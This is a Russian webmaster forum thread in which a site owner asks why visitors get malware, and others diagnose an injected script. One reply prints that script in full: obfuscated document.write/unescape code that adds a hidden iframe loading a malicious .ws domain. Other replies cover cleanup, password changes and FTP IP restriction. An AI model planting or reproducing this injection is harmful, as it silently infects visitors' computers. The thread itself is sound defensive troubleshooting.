Прошу помощи, на сайте вирус?

V1@d!m!r
На сайте с 09.10.2007
Offline
97
766

:confused::no: Есть проект. На днях сменил дизайн и начались проблемы.

Сайт - ex-surf.ru

При заходе на сайт подгружается АкробатРидер32.эхе и начинаются жуткие лаги, при чем антивирь молчит. Потом, еще что-то с левых сайтов из зоны .com грузится.

Код смотрел, ничего подозрительного не нашел. Помогите пожалуйста.

приаттачил код на всякий пожарный...

txt 21868.txt
Fat Bear
На сайте с 01.12.2006
Offline
264
#1

Вот что отдаётся при заходе на Ваш сайт:

Имеется информация о том, что сайт gavai-pegc9.ws используется для атак на компьютеры пользователей. В соответствии с вашими настройками безопасности он был заблокирован.
Открыть счёт в Capitalist ( https://capitalist.net/reg?from=e5707ff0c3 ). Виртуальные карты, USDT, банковские переводы, выплаты партнёрских программ. Push-партнёрка с высоким рейтом hClicks(https://hclicks.com/?ref=61dc0714).
V1@d!m!r
На сайте с 09.10.2007
Offline
97
#2

=( Масол, спасибо за информацию. Значит, вирус (... не подскажите, что делать? какие меры предпринять?

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
#3

вот он родимый:

<script>document.write(unescape('%3C')+unescape('%69%66%72')+unescape('%61%6D%65%20')+unescape('%73%72')+unescape('%63%3D%22')+unescape('%68')+unescape('%74%74')+unescape('%70')+unescape('%3A%2F')+unescape('%2F')+unescape('%67%61%76%61')+unescape('%69%2D')+unescape('%70')+unescape('%65')+unescape('%67')+unescape('%63%39%2E%77')+unescape('%73')+unescape('%2F')+unescape('%33%2E%68%74')+unescape('%6D%6C%22%20')+unescape('%77')+unescape('%69%64')+unescape('%74%68%3D%31')+unescape('%20%68')+unescape('%65%69')+unescape('%67%68%74')+unescape('%3D')+unescape('%31%20%73')+unescape('%74%79%6C')+unescape('%65%3D')+unescape('%22%76%69')+unescape('%73%69%62')+unescape('%69%6C%69')+unescape('%74')+unescape('%79%3A%20%68')+unescape('%69%64%64')+unescape('%65%6E')+unescape('%22%3E%3C')+unescape('%2F%69%66%72')+unescape('%61%6D%65%3E')+'');</script>

Частичная расшифровка:

ame src="http://gavai-pegc9.ws/3.html" width=1 height=1 style="visibility: hidden"><

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
V1@d!m!r
На сайте с 09.10.2007
Offline
97
#4

Эх, а я думал, что так и должно быть. Вроде как и раньше был этот кусок...

Спасибо, буду удалять...

DyaDya
На сайте с 11.04.2007
Offline
147
#5

Ага, он самый.

Проверяйте весь код на сервере. Хотя в основном заражают index.php во всех папках.

Меняйте пароль ФТП. Может уже и на почту пора менять(.

Где-то на сичах выкладывали скрипт на php позволяющий рекурсивно пройтись по папкам и файлам и удалить вредоносный код по шаблону! Правда, я не нашёл уже(.

Выбирайте качественный хостинг (http://vashmaster.ru/informaciya/o_poleznyh_programmah/news83.php) и продвигайте сайты в СЕОПУЛЬТ (http://seopult.ru/ref.php?ref=72b5ed9561fe66a1). А на «SAPE» я в обиде :) Не упрекайте за очепятки, пишу вслепую (http://ergosolo.ru/) и также делаю сайты (http://www.vashmaster.ru/) ;)
V1@d!m!r
На сайте с 09.10.2007
Offline
97
#6

удалил еще вчера в header.php сидел

agentvini
На сайте с 27.06.2008
Offline
40
#7

попробуйте вот это

zip antivir.zip
Тематический обмен (/ru/forum/319815) ссылками и статьями на темы туризм, отдых, гостиницы, рестораны с сайтом ЯК, тИЦ 300, Дмоз, ПР 3
MH
На сайте с 12.10.2008
Offline
0
#8

В сообщениях антивирусных служб появилась информация о вирусах, распространяющих себя через веб-сайты. Схема заражения довольно проста: достаточно зайти на зараженный сайт и при стандартных настройках безопасности браузера, вирус автоматически установится на компьютере пользователя. После этого он начинает отслеживать логины и пароли от FTP, высылая их злоумышленникам. Собрав определенное количество паролей, запускается специальная программа, которая подключается по FTP к каждому сайту и встраивает в начало или конец страниц собственный html-код или скрипт.

Для обеспечения Вашей безопасности мы включили возможность защиты FTP, ограничив доступ по IP.

В каталоге FTP-аккаунта должен находиться файл с именем .ftpaccess. Если файла нет или файл пустой (нулевой длины) или же в нем строка с точкой (она входит в любой IP-адрес) - доступ открыт для любого IP.

Настройка .ftpaccess файла:

- Если в файле .ftpaccess поставить цифру 1, то доступ будет открыт для всех IP, в которые входит такая цифра.

- Если в этом файле вписать Ваш внешний IP-адрес, доступ будет закрыт для всех других. Это самая эффективная защита вашего сайта.

- Для тех, кто пользуется конструктором для сайтов. Вам необходимо вписать в файл: .ftpaccess IP-адрес вашего сайта и IP–адрес сервера где находится конструктор (обратитесь в нашу тех. поддержку за этим IP-адресом).

- Вписать нужный вам IP адрес в .ftpaccess вы можете с помощью FTP клиента или посредством Файл-менеджера в ДиректАдмине и любой другой панели.

- Если Ваш IP динамический - можно прописать часть адреса, например: 195.131.185 или вписать несколько IP-адресов.

- Для того, чтобы прописать IP адрес с помощью cPanel, зайдите на вашу контрольную панель управления выберите Файл-менеджер, сделайте отметку для Home Directory и поставьые "галочку" в поле Show Hidden Files (dotfiles), кликните на кнопу ”Go”. В списке файлов выберите файл .ftpaccess, кликните правой кнопкой вашей мышки на этот файл, в открывшемся контекстном меню выберите Edit File, далее редактируйте файл .ftpaccess.

Файл .ftpaccess создается в корне Вашего ФТП - /.ftpaccess

Пример создаваемого файла .ftpaccess:

<Directory />

<Limit КОМАНДА>

Allow 192.168. #Группа айпи адресов 192.168.0-255.0-255

Allow 192.168.0. #Группа айпи адресов 192.168.0.0-255

Allow 192.168.0.101 #Если айпи адрес выделенный, то Вам понадобится эта строка.

DenyAll

</Limit>

</Directory>

Команды:

READ — все FTP-команды, связанные с чтением файлов (за исключением команд выдачи листинга содержимого директории), (RETR, SITE, SIZE, STAT);

WRITE — все FTP-команды, связанные с созданием, записью или удалением файлов или директорий (APPE, DELE, MKD, RMD, RNTO, STOR, XMKD, XRMD);

DIRS — все FTP-команды, связанные с выдачей листинга содержимого директории (CDUP, CWD, LIST, MDTM, NLST, PWD, RNFR, XCUP, XCWD, XPWD);

ALL — все FTP-команды (включает в себя все три класса READ, WRITE и DIRS).

Управление доступом в области действия Limit:

Allow from all | none | хост | сеть — разрешение на действие, определенное в директиве Limit, в зависимости от шаблона IP адреса или доменного имени; область действия — Limit; по умолчанию — from all;

AllowAll — явное разрешение доступа к области действия Limit, Anonymous или Directory.

AllowGroup список-групп-через-запятую — для доступа к командам, описанным в данной области действия Limit, пользователь должен входить во все упомянутые группы (AND, возможно отрицание, задаваемое восклицательным знаком перед именем группы). На виртуальном хостинге FTP-пользователи одной площадки относятся к группе uXXXX, где uXXXX – номер площадки.

AllowUser список-имен-через-запятую — для доступа к командам, описанным в данной области действия Limit, пользователь должен иметь указанные имена (AND, возможно отрицание, задаваемое восклицательным знаком перед именем).

Deny from all | none | хост | сеть — запрет на действие, определенное в директиве Limit, в зависимости от шаблона IP адреса или доменного имени; область действия — Limit; по умолчанию — from none.

DenyAll — синоним для команд «order deny,allow;deny from all».

DenyGroup список-групп-через-запятую — запрещен доступ к командам, описанным в данной области действия Limit, пользователям, входящим во все упомянутые группы (AND, возможно отрицание, задаваемое восклицательным знаком перед именем группы)

DenyUser список-имен-через-запятую запрещен доступ к командам, описанным в данной области действия Limit, для пользователей с указанным именем (AND, возможно отрицание, задаваемое восклицательным знаком перед именем).

Order allow,deny | deny,allow — определяет последовательность проверки директив Allow и Deny, а также действия по умолчанию; allow,deny: проверяются директивы Allow, если совпадение найдено, то доступ предоставляется, иначе проверяются директивы Deny и если совпадение найдено, то доступ запрещается, иначе доступ предоставляется; deny,allow: проверяются директивы Deny и если совпадение найдено, то доступ запрещается, иначе проверяются директивы Allow и если совпадение найдено, то доступ предоставляется, иначе доступ запрещается; заметьте, что в Apache по умолчанию производятся противоположные действия!

Взято от сюда

MAxejHOST.ru - хостинг с ддос протекцией MotorHOST.org.ua - хостинг по самым низким ценам

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий